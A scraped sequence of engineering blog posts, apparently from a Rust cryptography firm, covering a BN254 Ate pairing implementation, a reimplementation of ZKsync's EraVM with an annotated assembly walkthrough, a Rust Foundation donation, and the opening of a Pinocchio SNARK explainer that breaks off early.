    19. $Q_2 \leftarrow \varphi(Q_1)$;</span></span>
    20. $f \leftarrow f \cdot l_{T, - Q_2}(P)$;</span></span>
    21. $f \leftarrow f^{ \frac{ p^{12} - 1 }{r}}$;</span></span>
    22. return f;</span></span></code></pre>

where:</p>
    * The number `MILLER_CONSTANT` $=6x + 2$ with $x$ as the curve parameter we mentioned before. However, we need a particular representation of this number using powers of 2 and the coefficients $\\{- 1, 0, 1 \\}$. This representation is similar to a [NAF representation](https://en.wikipedia.org/wiki/Non-adjacent_form#:~:text=The%20non%2Dadjacent%20form%20\(NAF,8%20%E2%88%92%202%20%2B%201%20%3D%207\)), although it isn't a NAF because it has non-zero values adjacent.</span></span>
          </span></span>
          // MILLER_CONSTANT = 6x + 2 = 29793968203157093288 =</span></span>
          // 2^3 + 2^5 - 2^7 + 2^10 - 2^11 + 2^14 + 2^17 + 2^18 - 2^20 + 2^23 </span></span>
          // - 2^25 + 2^30 + 2^31 + 2^32 - 2^35 + 2^38 - 2^44 + 2^47 + 2^48 </span></span>
          // - 2^51 + 2^55 + 2^56 - 2^58 + 2^61 + 2^63 + 2^64</span></span>
          pub const MILLER_CONSTANT: [i32; 65] = [</span></span>
              0, 0, 0, 1, 0, 1, 0, -1, 0, 0, 1, -1, 0, 0, 1, 0, 0, 1, 1, 0, -1, 0, 0, </span></span>
              1, 0, -1, 0, 0, 0, 0, 1, 1, 1, 0, 0, -1, 0, 0, 1, 0, 0, 0, 0, 0, -1, 0, </span></span>
              0, 1, 1, 0, 0, -1, 0, 0, 0, 1, 1, 0, -1, 0, 0, 1, 0, 1, 1</span></span>
          ];</span></span>
          </span></span>
          </span></span>
          let miller_length = MILLER_CONSTANT.len()</span></span>
          </span></span>
</span>
    * The function $l_{T, Q}(P)$ is the line that passes through $T$ and $Q$ evaluated in $P$. We'll see how to compute it later.</span></span>
</span>
    * The Frobenius morphism $\varphi: E'(\mathbb{F_{ p^2 } }) \to E'(\mathbb{F_{ p^2 }})$ is defined as $\varphi(x, y) = (x^p, y^p)$. We'll also see it later.</span></span></code></pre>Batch</h3>
We will divide the algorithm presented into Miller Loop and Final Exponentiation to implement it. The miller()</code> function does all the work from lines 1 to 20 of the algorithm, while final_exponentiation()</code> computes only the last line 21 (which is a computation that requires some work). However, if we have different pairs of points $(P, Q)$ and we want to calculate each of their pairings to multiply all the results together (and see, for example, if it equals $1$), the most efficient way to do it is first to execute the Miller Loop for each pair of points, multiply the results and then apply the Final Exponentiation to the final result. The function that does this procedure is called compute_batch()</code>.</p>
fn compute_batch(</span></span>
    pairs: &[(&Self::G1Point, &Self::G2Point)],</span></span>
) -> Result<FieldElement<Self::OutputField>, PairingError> {</span></span>
    let mut result = Fp12E::one();</span></span>
    for (p, q) in pairs {</span></span>
        // do some checks before computing the Miller loop</span></span>
        // ...</span></span>
        if !p.is_neutral_element() && !q.is_neutral_element() {</span></span>
            let p = p.to_affine();</span></span>
            let q = q.to_affine();</span></span>
            result *= miller(&p, &q);</span></span>
        }</span></span>
    }</span></span>
    Ok(final_exponentiation(&result))</span></span>
}</span></span></code></pre>Subgroup Check</h2>
Before applying the pairing to a given pair of points $(P, Q)$, it is necessary to check that the points belong to its domain. In other words, we need to see that $P \in \mathbb{G_1 }$ and $Q \in \mathbb{G_2 }$. Since $\mathbb{G_1 } = E(\mathbb{F_p })$, there is nothing to check about $P$. But, since $\mathbb{G_2 }$ is distinct from $E’(\mathbb{F_{ p^2 }})$, we need an efficient way to check that $Q$ belongs to the subgroup.</p>
We’ll use this post</a> that states that a point $Q \in E’(\mathbb{F_{ p^2 }})$ belongs to $\mathbb{G_2 }$ if and only if

$$(x + 1)Q + \varphi (xQ) + \varphi^2 (xQ) = \varphi^3 (2xQ).$$ Recall that $x$ is one of the curve’s parameters and $\varphi$ is the Frobenius Morphism mentioned before. So first, we need to implement this morphism efficiently, avoiding powering elements to $p$ (because $p$ is a very large number). For that, we’ll use two constants $\gamma_{1,2}, \gamma_{1,3} \in \mathbb{F_{ p^2 }}$ (later on, we’ll see them in more detail).</p>
pub const GAMMA_12: Fp2E = Fp2E::const_from_raw([</span></span>
    FpE::from_hex_unchecked("2FB347984F7911F74C0BEC3CF559B143B78CC310C2C3330C99E39557176F553D"),</span></span>
    FpE::from_hex_unchecked("16C9E55061EBAE204BA4CC8BD75A079432AE2A1D0B7C9DCE1665D51C640FCBA2"),</span></span>
]);</span></span>
</span>
pub const GAMMA_13: Fp2E = Fp2E::const_from_raw([</span></span>
    FpE::from_hex_unchecked("63CF305489AF5DCDC5EC698B6E2F9B9DBAAE0EDA9C95998DC54014671A0135A"),</span></span>
    FpE::from_hex_unchecked("7C03CBCAC41049A0704B5A7EC796F2B21807DC98FA25BD282D37F632623B0E3"),</span></span>
]);</span></span></code></pre>
Having these constants, it’s very easy to compute $\varphi$. We simply use that $$\varphi(x, y) = (\gamma_{1,2} \bar x, \gamma_{1,3} \bar y),$$ where $\bar x$ is the notation for the conjugate of $x$: If $x = a + bw \in \mathbb{F_{ p^2 }}$, then $\bar x = a - b w.$</p>
pub fn phi(&self) -> Self {</span></span>
    let [x, y, z] = self.coordinates();</span></span>
    Self::new([</span></span>
        x.conjugate() * GAMMA_12,</span></span>
        y.conjugate() * GAMMA_13,</span></span>
        z.conjugate(),</span></span>
    ])</span></span>
}</span></span></code></pre>
Now that we have $\varphi$, we can implement a function that determines if a certain point $Q$ of the twist curve $E’(\mathbb{F_{ p^2 }})$ belongs to the subgroup $\mathbb{G_2 }$.</p>
pub fn is_in_subgroup(&self) -> bool {</span></span>
    let q_times_x = &self.operate_with_self(X);</span></span>
    let q_times_x_plus_1 = &self.operate_with(q_times_x);</span></span>
    let q_times_2x = q_times_x.double();</span></span>
    </span></span>
    q_times_x_plus_1.operate_with(&q_times_x.phi().operate_with(&q_times_x.phi().phi()))</span></span>
        == q_times_2x.phi().phi().phi()</span></span>
}</span></span></code></pre>The Line</h2>
Let’s see now how to implement for all $T, Q \in \mathbb{G_2 }$ and $P \in \mathbb{G_1 }$ the line $l_{T, Q}(P)$, called in lambdaworks line()</code>, the fundamental function of the Miller Loop. First, we could have two cases: $T = Q$ or $T \neq Q$. In the first case, $l_{T, T} (P)$ is the tangent line of $T$ evaluated in $P$. In the second case, it is the line that passes through $T$ and $Q$ evaluated in $P.$</p>
For our implementation, we relied on the algorithm proposed in The Realm of the Pairings</a>. We use equation 11 on page 13 for the case $T = Q$ and the first equation on page 14 for the case $T \neq Q.$ You can also see the Arkworks implementation</a> of the same algorithm, where the function that computes the case $T=Q$ is called double_in_place()</code>, and the one for the case $T \neq Q$ is called add_in_place()</code>. You will see that both the paper and Arkworks define more variables than we do. That’s because those functions compute the line and $2T$ (in the first case) and $T + Q$ (in the second case), necessary values for the lines 7, 10, 13, and 18 of the Ate pairing algorithm. We didn’t have to do it that way because in those lines, to double an element or to add two elements of a group, we used the lambdaworks functions operate_with_self()</code> and operate_with()</code>. To simplify understanding, we kept the same variable names appearing in the paper and Arkworks. Notice that adding or duplicating points the way they do it there only requires including a couple of lines to our function line()</code>, so it’s straightforward to compare both implementations and optimize ours if needed.</p>
Finally, it’s helpful to remark that the paper gives the result of the line as a polynomial of degree 5, while in lambdaworks, the elements of $\mathbb{F_{ p^{12} }}$ have another representation. So, we need to use the transformation explained in the Field Extensions Towers section.</p>
fn line(p: &G1Point, t: &G2Point, q: &G2Point) -> Fp12E {</span></span>
    let [x_p, y_p, _] = p.coordinates();</span></span>
</span>
    if t == q {</span></span>
        let b = t.y().square();</span></span>
        let c = t.z().square();</span></span>
        //Define all the variables necessary</span></span>
        //...</span></span>
        </span></span>
        // We transform one representation of Fp12 into another one:</span></span>
        Fp12E::new([</span></span>
            Fp6E::new([y_p * (-h), Fp2E::zero(), Fp2E::zero()]),</span></span>
            Fp6E::new([x_p * (j.double() + &j), i, Fp2E::zero()]),</span></span>
        ])</span></span>
    } else {</span></span>
        let [x_q, y_q, _] = q.coordinates();</span></span>
</span>
        let theta = t.y() - (y_q * t.z());</span></span>
        let lambda = t.x() - (x_q * t.z());</span></span>
        let j = &theta * x_q - (&lambda * y_q);</span></span>
</span>
        Fp12E::new([</span></span>
            Fp6E::new([y_p * lambda, Fp2E::zero(), Fp2E::zero()]),</span></span>
            Fp6E::new([x_p * (-theta), j, Fp2E::zero()]),</span></span>
        ])</span></span>
    }</span></span>
}</span></span></code></pre>Final Exponentiation</h2>
The last thing we need is to compute efficiently $f^{ \frac{ p^{12} - 1}{r}}.$ We took the final exponentiation algorithm from here</a>, which divides the exponent in the following way:

$$\frac{ p^{12} - 1 }{r} = ( p^6 - 1) ( p^2 + 1) \frac{ p^4 - p^2 + 1}{r}$$</p>
The Easy Part</h3>
We want to compute

$$f^{ ( p^6 - 1)( p^2 + 1)} = (f^{ p^6 } f^{ - 1})^{ p^2 } \cdot (f^{ p^6 } f^{- 1 }) .$$

This will be easy to do using:</p>
    * $f^{ p^6 } = \bar f$ and we can calculate it using `conjugate()`. This is true because $f \in \mathbb{F_{ p^{12} }}$ and this property follows from the [Frobenius morphism as seen here](https://github.com/mratsim/constantine/blob/master/constantine%2Fmath%2Fpairings%2Fcyclotomic_subgroups.nim#L154).</span></span>
</span>
    * The function `inv()` computes $f^{ - 1}$.</span></span>
</span>
    * To compute $(f^{ p^6 } f^{ - 1})^{ p^2 }$ we can use the Frobenius squared morphism $\pi_p^2 : \mathbb{F_{ p^{12} }} \to \mathbb{F_{ p^{12} }},$ defined as $$\pi_p^2 (f) = \pi_p ( \pi_p (f)) = f^{ p^2 }.$$ In the last section, we explain how to implement it.</span></span>
</span>
let f_easy_aux = f.conjugate() * f.inv().unwrap();</span></span>
let f_easy = &frobenius_square(&f_easy_aux) * f_easy_aux;</span></span></code></pre>The Hard Part</h3>
Now we need to raise the result of the easy part to the power $\frac{p^4 - p^2 + 1}{r}.$ We took the exact algorithm presented here</a> as four steps, where f_easy</code> is called there $m$. As explained in that post, this algorithm can be improved using a vectorial addition chain technique.</p>
Frobenius Morphism</h2>
Finally, let’s see how to implement the Frobenius morphisms $\pi_p$, $\pi_p^2$, and $\pi_p^3$ used in the Final Exponentiation.</p>
You may remember that we have already implemented a Frobenius morphism $\varphi$. Although they have the same name, there is a slight difference between $\varphi$ and $\pi_p$: The function $\pi_p$ raises elements of $\mathbb{F_{ p^{12} }}$ to the power $p$, while $\varphi$ raises the coordinates of the twisted curve points to the power $p$. In other words, $\pi_p : \mathbb{F_{ p^{12} }} \to \mathbb{F_{ p^{12} }}$ while $\varphi : E’(\mathbb{F_{ p^2 }}) \to E’(\mathbb{F_{ p^2 }})$. That is why their implementations are not exactly the same.</p>
To implement these morphisms we need to define for all $j = 1, \ldots 5$, the constants $$\begin{align}\gamma_{ 1 , j } &= (9 + u)^{ \frac{ j ( p - 1) }{6}} \

\gamma_{2,j} &= \gamma_{1,j} \cdot \overline{\gamma_{1,j}} \newline

\gamma_{3,j} &= \gamma_{1,j} \cdot \gamma_{2,j}\end{align}$$</p>
pub const GAMMA_11: Fp2E = Fp2E::const_from_raw([</span></span>
    FpE::from_hex_unchecked("1284B71C2865A7DFE8B99FDD76E68B605C521E08292F2176D60B35DADCC9E470"),</span></span>
    FpE::from_hex_unchecked("246996F3B4FAE7E6A6327CFE12150B8E747992778EEEC7E5CA5CF05F80F362AC"),</span></span>
]);</span></span>
</span>
pub const GAMMA_12: Fp2E = Fp2E::const_from_raw([</span></span>
    FpE::from_hex_unchecked("2FB347984F7911F74C0BEC3CF559B143B78CC310C2C3330C99E39557176F553D"),</span></span>
    FpE::from_hex_unchecked("16C9E55061EBAE204BA4CC8BD75A079432AE2A1D0B7C9DCE1665D51C640FCBA2"),</span></span>
]);</span></span>
</span>
// etc.</span></span></code></pre>
Now, we use that if $f = a + bw$, then</p>
pub fn frobenius(f: &Fp12E) -> Fp12E {</span></span>
    let [a, b] = f.value();</span></span>
    let [a0, a1, a2] = a.value(); </span></span>
    let [b0, b1, b2] = b.value(); </span></span>
</span>
    let c1 = Fp6E::new([</span></span>
        a0.conjugate(),</span></span>
        a1.conjugate() * GAMMA_12,</span></span>
        a2.conjugate() * GAMMA_14,</span></span>
    ]);</span></span>
</span>
    let c2 = Fp6E::new([</span></span>
        b0.conjugate() * GAMMA_11,</span></span>
        b1.conjugate() * GAMMA_13,</span></span>
        b2.conjugate() * GAMMA_15,</span></span>
    ]);</span></span>
</span>
    Fp12E::new([c1, c2])</span></span>
}</span></span>
</span>
// similarly, frobenius_square and frobenius_cube.</span></span>
// ...</span></span></code></pre>
Lastly, if we apply twelve times $\pi_p$, six times $\pi_p^2$, or four times $\pi_p^3$ to $f$, we get $f$ (i.e., they become the identity function). That’s because $f \in \mathbb{F_{ p^{12} }}$, and then $f^{ p ^{12} } = f.$ This property will help us test if we implemented these morphisms correctly.</p>
Summary</h2>
This post explored how we combined various works and papers to implement our pairing. In doing so, we successfully integrated algorithms from different implementations by making transformations between point coordinates or different representations of the same extension of fields.</p>
What’s next?</h4>
Now that we have a pairing working, the next step is to know how this implementation compares with others. So, we will perform some benchmarks and make some optimizations that we are already aware of. As it’s written in Lambda’s Engineering Philosophy</a>:, “Make it work, then make it beautiful, then if you really, really have to, make it fast.”</p>


How we created a research fast VM for ZKsync
Unknown — Mon, 05 Aug 2024 00:00:00 +0000
For the past few weeks we have been working on a reimplementation of ZKsync’s (out of circuit) EraVM. The goal is to improve on its current performance and explore the possibility of adding parallel execution through BlockSTM. For that, we first had to make a deep dive into how the EraVM works and how it differs from the EVM.</p>
We want to thank Anthony Rose and the Matter Labs team for all their help on this project, especially their new fastVM implementation</a> which we used a lot as a reference.</p>
You can follow our progress on our EraVM repository</a>.</p>
Development Process</h2>
It’s important to state our methodology: even though the main goal here is improving performance, our goal starting out is different: we want a simple implementation working.</p>
We do not care about benchmarks at first</strong>. We know our initial implementation will be slow, but that’s not the point: the point is to get something simple working to understand all the moving parts. Only after that’s in place we shift our focus to benchmarks and performance.</p>
When we started out we knew very little about the EraVM. We knew it was different from the EVM, and had indirectly used zksolc</code> to compile and deploy contracts to the network, but had not looked much into the underlyings of it.</p>
The first thing we did to get into a working flow was to inspect the VM’s bytecode. We compiled simple contracts into EraVM assembly and started getting familiar with it. The goal when starting out on an unfamiliar VM is to setup a simple fetch->decode->execute</code> loop that looks something like this:</p>
fn run(</span></span>
    vm: VM,</span></span>
) {</span></span>
    loop {</span></span>
        let opcode = vm.get_opcode(&opcode_table)?;</span></span>
</span>
        match opcode {</span></span>
                Opcode::Add => todo!(),</span></span>
                Opcode::Sub => todo!(),</span></span>
                Opcode::Jump => todo!(),</span></span>
                Opcode::Mul => todo!(),</span></span>
                Opcode::Div => todo!(),</span></span>
                ... => ...</span></span>
        }</span></span>
        vm.pc += 1;</span></span>
    }</span></span>
    ...</span></span>
}</span></span></code></pre>
and then progressively implement all the opcodes. When we started looking at the assembly generated on contracts we realized the EraVM was a lot more complex than the EVM in terms of opcodes; fortunately, Matter Labs has a very good primer on them</a> and a full formal specification</a>.</p>
After reading those and reading their own implementations, we stumbled into their own repo defining all the VM opcodes</a>, and from there we could setup a proper loop like the above.</p>
With it, we started writing our own simple EraVM assembly programs testing all the different opcodes as we implemented them. Eventually, after getting the basic functionality in place, these simple assembly programs we wrote started becoming insufficient to test complex interactions like contracts calling other contracts, gas management, etc; we needed a proper test suite.</p>
That proper test suite is the era-compiler-tester</a>, a full test suite for the VM written by Matter Labs (technically this is also a test suite for the zksolc</code> compiler itself, but we care about VM testing here). To get a fully working VM, we realized we needed to make these tests pass.</p>
Before going into detail about them, let’s do a quick overview of the VM we set to reimplement.</p>
EraVM Overview</h2>
ZKsync is a zk-Rollup meant to be EVM compatible. In practice, this can mean a number of different things. For ZKsync, it means that it’s compatible at the programming language level; this is done through zksolc</code>, an LLVM based compiler written by Matter Labs that takes any Solidity, Yul or Vyper contract and compiles it down to the EraVM bytecode.</p>
This might seem like full compatibility, but it’s not. The EraVM has a completely different architecture than the EVM, and some of these differences cannot be fully abstracted away.</p>
As an example, the following Solidity contract:</p>
contract Test {</span></span>
    function main(uint256 a, uint256 b) external pure returns(uint256 result) {</span></span>
        result = a + b;</span></span>
    }</span></span>
}</span></span></code></pre>
compiles to an EVM assembly that looks like this:</p>
PUSH1 0x80</span></span>
PUSH1 0x40</span></span>
MSTORE</span></span>
CALLVALUE</span></span>
DUP1</span></span>
ISZERO</span></span>
PUSH1 0xE</span></span>
JUMPI</span></span>
...</span></span></code></pre>
and an EraVM assembly that looks like this:</p>
add	 128, r0, r3</span></span>
st.1	 64, r3</span></span>
and!	1, r2, r0</span></span>
jump.ne	@.BB0_1</span></span>
add	 r1, r0, r2</span></span>
shr.s	96, r2, r2</span></span>
and	 @CPI0_0[0], r2, r2</span></span>
sub.s!	4, r2, r0</span></span>
jump.lt	@.BB0_2</span></span>
ld	r1, r3</span></span>
...</span></span></code></pre>
Clearly these are very different VMs. This requires getting used to these two different architectures when working at the VM level on ZKsync. A lot of operations that are opcodes on the EVM</code> are not on the EraVM</code>.</p>
For instance, the EVM has a returndatacopy</code> opcode, which copies the output data from a previous contract call into memory. On the EraVM</code> there is no such thing; a call to returndatacopy</code> on a Yul contract will compile to a block of code that looks like this:</p>
.BB0_19:</span></span>
  ld.inc	r5, r7, r5</span></span>
  st.1.inc	r6, r7, r6</span></span>
  sub!	r6, r4, r0</span></span>
  jump.ne	@.BB0_19</span></span></code></pre>
We omitted some context, but this is essentially just a loop that will continously load (ld</code>) a word from the called contract’s memory and then store it (st</code>) on the caller contract’s memory, then conditionally jump back (jump.ne</code>) to the loop if the copying is not done yet (i.e. if the sub!</code> instruction does not yield zero).</p>
This is just one example: most complex EVM opcodes work in in a similar fashion on the EraVM.</p>
Era Compiler Test suite</h2>
There are millions of tests on the era-compiler-tester</code> repo, but they all follow the same structure. Each test is a Solidity, Yul or Vyper contract that is compiled with zksolc</code> and run with certain inputs, in turn expecting certain outputs. As an example, the default.sol</a> test looks like this:</p>
//! { "cases": [ {</span></span>
//!     "name": "first",</span></span>
//!     "inputs": [</span></span>
//!         {</span></span>
//!             "method": "first",</span></span>
//!             "calldata": [</span></span>
//!             ]</span></span>
//!         }</span></span>
//!     ],</span></span>
//!     "expected": [</span></span>
//!         "42"</span></span>
//!     ]</span></span>
//! }, {</span></span>
//!     "name": "second",</span></span>
//!     "inputs": [</span></span>
//!         {</span></span>
//!             "method": "second",</span></span>
//!             "calldata": [</span></span>
//!             ]</span></span>
//!         }</span></span>
//!     ],</span></span>
//!     "expected": [</span></span>
//!         "99"</span></span>
//!     ]</span></span>
//! } ] }</span></span>
</span>
// SPDX-License-Identifier: MIT</span></span>
</span>
pragma solidity >=0.4.16;</span></span>
</span>
contract Test {</span></span>
    function first() public pure returns(uint64) {</span></span>
        uint64 result = 42;</span></span>
        return result;</span></span>
    }</span></span>
</span>
    function second() public pure returns(uint256) {</span></span>
        uint256 result = 99;</span></span>
        return result;</span></span>
    }</span></span>
}</span></span></code></pre>
The comment above it specifies what the test should run and what it expects. In this case, there are two tests, which should run the methods first</code> and second</code> and then get 42</code> and 99</code> as a result respectively. Most tests have a lot of comments specifying different runs, testing different functions with different inputs/outputs and so on.</p>
Deep dive into a ZKsync Era contract</h2>
Let’s compile the default.sol</code> program above and see what it’s doing under the hood. Running</p>
zksolc default.sol --asm -o default --optimization 3 --overwrite</span></span></code></pre>
will place a default.zasm</code> file under the default</code> directory. This is the EraVM assembly for the contract:</p>
	.text</span></span>
	.file	"default.sol:Test"</span></span>
	.globl	__entry</span></span>
__entry:</span></span>
.func_begin0:</span></span>
	add	128, r0, r3</span></span>
	st.1	64, r3</span></span>
	and!	1, r2, r0</span></span>
	jump.ne	@.BB0_1</span></span>
	add	r1, r0, r2</span></span>
	and!	@CPI0_1[0], r2, r0</span></span>
	jump.eq	@.BB0_2</span></span>
	ld	r1, r1</span></span>
	shr.s	224, r1, r1</span></span>
	sub.s!	@CPI0_2[0], r1, r0</span></span>
	jump.eq	@.BB0_10</span></span>
	sub.s!	@CPI0_3[0], r1, r0</span></span>
	jump.ne	@.BB0_2</span></span>
	context.get_context_u128	r1</span></span>
	sub!	r1, r0, r0</span></span>
	jump.ne	@.BB0_2</span></span>
	add	42, r0, r1</span></span>
	st.1	128, r1</span></span>
	add	@CPI0_4[0], r0, r1</span></span>
	ret.ok.to_label	r1, @DEFAULT_FAR_RETURN</span></span>
.BB0_1:</span></span>
	context.get_context_u128	r1</span></span>
	sub!	r1, r0, r0</span></span>
	jump.ne	@.BB0_2</span></span>
	add	32, r0, r1</span></span>
	st.2	256, r1</span></span>
	st.2	288, r0</span></span>
	add	@CPI0_0[0], r0, r1</span></span>
	ret.ok.to_label	r1, @DEFAULT_FAR_RETURN</span></span>
.BB0_10:</span></span>
	context.get_context_u128	r1</span></span>
	sub!	r1, r0, r0</span></span>
	jump.ne	@.BB0_2</span></span>
	add	99, r0, r1</span></span>
	st.1	128, r1</span></span>
	add	@CPI0_4[0], r0, r1</span></span>
	ret.ok.to_label	r1, @DEFAULT_FAR_RETURN</span></span>
.BB0_2:</span></span>
	add	r0, r0, r1</span></span>
	ret.revert.to_label	r1, @DEFAULT_FAR_REVERT</span></span>
.func_end0:</span></span>
</span>
	.note.GNU-stack</span></span>
	.rodata</span></span>
CPI0_0:</span></span>
	.cell	53919893334301279589334030174039261352344891250716429051063678533632</span></span>
CPI0_1:</span></span>
	.cell	340282366604025813406317257057592410112</span></span>
CPI0_2:</span></span>
	.cell	1519042605</span></span>
CPI0_3:</span></span>
	.cell	1039457780</span></span>
CPI0_4:</span></span>
	.cell	2535301202817642044428229017600</span></span></code></pre>
A few things you need to know about the EraVM before diving in:</p>
    * The native word is a `U256` (256 bit unsigned integer).</span></span>
    * There are 16 registers, `r0` through `r15`.</span></span>
      * `r0` is the zero register: writing to it does nothing, reading from it yields zero.</span></span>
      * `r1` is used as a pointer to the calldata (i.e. function arguments) when calling other contracts, and to the returndata when returning from calls.</span></span>
      * `r2` usually stores information about whether the current call is a constructor call, a regular function call, or a system call (a call to a system contract with special privileges).</span></span>
    * Every contract call gets its own stack and heap memory.</span></span></code></pre>Step by Step</h3>
Let’s do a step by step overview of this assembly.</p>
When someone calls this contract, execution always begins from the __entry</code> symbol. The first two instructions are doing some setup we don’t care much for, storing the value 128</code> onto the r3</code> register:</p>
add	128, r0, r3</span></span>
st.1 64, r3</span></span></code></pre>
In more detail, add 128, r0, r3</code> adds 128</code> to the value in r0</code> and stores it in r3</code>. Because r0</code> is the zero register, this is essentially storing 128</code> in r3</code> (this the way mov</code>s to registers are always done in the EraVM).

st.1</code> then stores the value in r3</code> to memory address 64</code> (if you’re wondering what the 1</code> is in st.1</code>, it’s the type of heap to use; the EraVM has both a regular and a special auxiliary</em> heap).</p>
Then, there’s a check on the r2</code> register and a conditional jump:</p>
and! 1, r2, r0</span></span>
jump.ne	@.BB0_1</span></span></code></pre>
The and!</code> instruction is doing a bitwise and</code> between 1</code> and r2</code>, storing it to r0</code>, then setting the zero flag accordingly. This is storing to r0</code> because we don’t care about the result. We are just checking whether the r2</code> register is 1 or not. If it is, then this is a constructor call, and we should jump to block @.BB0_1</code>, which contains the constructor logic; if it’s not we should continue.</p>
If the call is not a constructor call, the code will then do</p>
add	r1, r0, r2</span></span>
and!	@CPI0_1[0], r2, r0</span></span>
jump.eq	@.BB0_2</span></span></code></pre>
This puts the calldata</code> pointer that’s in r1</code> into r2</code>, then does an and</code> instruction and a conditional jump to make sure it’s not pointing to an invalid address. If it is, then execution jumps to block @.BB0_2</code>, which contains the revert logic:</p>
.BB0_2:</span></span>
  add	r0, r0, r1</span></span>
  ret.revert.to_label	r1, @DEFAULT_FAR_REVERT</span></span></code></pre>
If the address is valid, the code follows like this:</p>
ld	r1, r1</span></span>
shr.s	224, r1, r1</span></span></code></pre>
This is loading the first 32 bytes the calldata pointer points to through an ld</code> instruction, storing it in r1</code>, then shifting it 224</code> bits to the right to keep only its first 4 bytes (256</code>- 224</code> = 32</code> bits = 4 bytes).</p>
These 4 bytes are the function selector</em> of this contract call. This default.sol</code> contract has two functions</p>
function first() public pure returns(uint64)</span></span>
function second() public pure returns(uint256)</span></span></code></pre>
The selector for the first one is 0x3df4ddf4</code>, while for the second one it’s 0x5a8ac02d</code> (you can check them yourself here</a>). If you convert these values to decimal, you’ll see these are the values for the labels CPI0_3</code> and CPI0_2</code> respectively in the assembly. That’s why the code does a sub.s!</code> instruction, comparing the result of this selector in r1</code> against CPIO_2</code></p>
sub.s!	@CPI0_2[0], r1, r0</span></span>
jump.eq	@.BB0_10</span></span></code></pre>
If the value matches, execution jumps to block .BB0_10</code>, containing the logic for the second</code> function that just returns 99</code>:</p>
.BB0_10:</span></span>
  context.get_context_u128	r1</span></span>
  sub!	r1, r0, r0</span></span>
  jump.ne	@.BB0_2</span></span>
  add	99, r0, r1</span></span>
  st.1	128, r1</span></span>
  add	@CPI0_4[0], r0, r1</span></span>
  ret.ok.to_label	r1, @DEFAULT_FAR_RETURN</span></span></code></pre>
You can see the add 99, r0, r1</code> followed by st.1 128, r1</code> to store the return value into memory. The code before it is just checking whether the caller passed any wei</code> using the context.get_context_u128 r1</code> instruction, and reverting if so (this function is not payable).</p>
If the selector did not match CPI0_2</code> (the selector for the second()</code> function), then the code checks against the first()</code> selector (label CPIO_3</code>):</p>
sub.s!	@CPI0_3[0], r1, r0</span></span>
jump.ne	@.BB0_2</span></span></code></pre>
In this case, because it’s the last valid function selector for the contract, if the value does not match we just go to the revert block BB0_2</code>. If it does match we continue with the logic for the first()</code> function, doing the same but returning 42</code> instead of 99</code>:</p>
context.get_context_u128	r1</span></span>
sub!	r1, r0, r0</span></span>
jump.ne	@.BB0_2</span></span>
add	42, r0, r1</span></span>
st.1	128, r1</span></span>
add	@CPI0_4[0], r0, r1</span></span>
ret.ok.to_label	r1, @DEFAULT_FAR_RETURN</span></span></code></pre>
And that’s it, that’s the entire EraVM assembly code for this contract. To summarize, the code is organized as follows:</p>
    * The `__entry` block is the entrypoint for any call to this contract.</span></span>
    * Block `BB0_1` contains the contract's constructor logic (the default one in this case, since we didn't write one ourselves).</span></span>
    * Block `BB0_10` contains the code for the `second()` function.</span></span>
    * Block `BB0_2` just has the revert logic.</span></span>
    * When someone calls this contract the code will do, in order, the following:</span></span>
      * Check whether this is a constructor call and jump to `BB0_10` if so.</span></span>
      * Read from the `calldata` pointer, revert by jumping to `BB0_2` if the address it points to is invalid.</span></span>
      * Get the first 4 bytes of calldata to obtain the function selector.</span></span>
      * Check the provided selector against the `second()` selector stored in `CPI0_2`. Jump to block `BB0_10` if it matches.</span></span>
      * Check whether the selector matches `first()`. Revert if it does not, run the code for `first()` otherwise.</span></span></code></pre>Current status and next steps</h2>
We are working on the last stretch of fixes to make all tests pass. Once that’s done, our focus will shift entirely to benchmarking the VM and start making optimizations. In anticipation for this, we started integrating with the ZKsync Era benchmarks</a>. This work requires integrating the VM with the bootloader</code></a>, the contract in ZKsync that executes blocks (essentially the network’s main execution entrypoint).</p>
This bootloader integration will also allow us to get our VM plugged into a ZKsync operator and start playing around with optimistic parallel execution ideas. Actually, getting parallel execution will probably involve modifying the bootloader or getting rid of it altogether when executing on the operator, but that’s a topic for another post.</p>


Giving Back: The Rust Foundation
Unknown — Wed, 31 Jul 2024 00:00:00 +0000
We recently contributed $100,000 to the Rust Foundation and would like to share the reasoning behind our decision and the process that led us to this commitment.</p>
A slice of Lambda’s history is that it started as a group of engineers with experience working on scalable and fault-tolerating systems. One of our main tools was (and still is) the Erlang/Elixir ecosystem, which is an extraordinary solution for certain categories of problems, and allows easy extension via writing C and an FFI. However, many of the fault-tolerant properties provided by the platform are put at risk when linking with C code. We viewed Rust as an excellent complement which would allow us to get the best of both worlds.

In time, we found the areas Rust excells in, and today many of our production system rely on the language and community behind the tools and libraries we use.</p>
Another slice of our history is that Lambda hails from South America and specifically from Argentina, a place where tech companies are a bit of underdogs at times. What many people do not know is that some of our strengths are directly related to this. Argentina boasts a public education system allowing anyone to get higher education. Many of Lambda’s employees are also professors and work at several universities. We work together with them to teach Rust and ensure a healthy hiring pool and improve future possibilities for all students.</p>
In short, we are proud to give back to the community that helped us grow, grateful to the Rust Foundation for channeling contributions, and we hope to continue contributing as our means allow.</p>
</p>


Pinocchio: verifiable computation revisited
Unknown — Wed, 31 Jul 2024 00:00:00 +0000
1. Introduction</h2>
1.1 Motivation</h3>
Imagine you want to do a complex computation, that you cannot carry out in your computer, or you need to get the results from a computer that you don’t trust. How can you be sure it was done correctly without redoing it yourself or understanding the intricate details? Introduced in 2013, Pinocchio</a> provides a solution using SNARKs. This technology enables a prover to demonstrate the correctness of their computations succinctly and be able to verify them, without revealing the details. Although Pinocchio itself has evolved and is no longer used in its original form, understanding it helps us appreciate the SNARKs that power today’s blockchain technologies, including ZK Rollups, enhancing scalability and privacy.</p>
1.2 What is a SNARK?</h3>
So, Pinocchio is a SNARK protocol, but what is a SNARK? SNARK stands for Succinct, Non-Interactive Argument of Knowledge. Succinct</em> , because we will have small proofs which are easy to verify. Non-Interactive</em> , because the proof generated can be used to convince any number of verifiers without requiring direct interactions with the prover. Arguments of Knowledge</em> , because we know with very high probability that the prover is not cheating. Essentially, SNARK protocols offer us a method to “compress” a complex computation into a small, easy-to-verify proof.</p>
1.3 Why do we need SNARKs?</h3>
It sounds cool to be able to prove the validity of a computation without having to give its code, but what are the applications in the real world? Where is it used?</p>
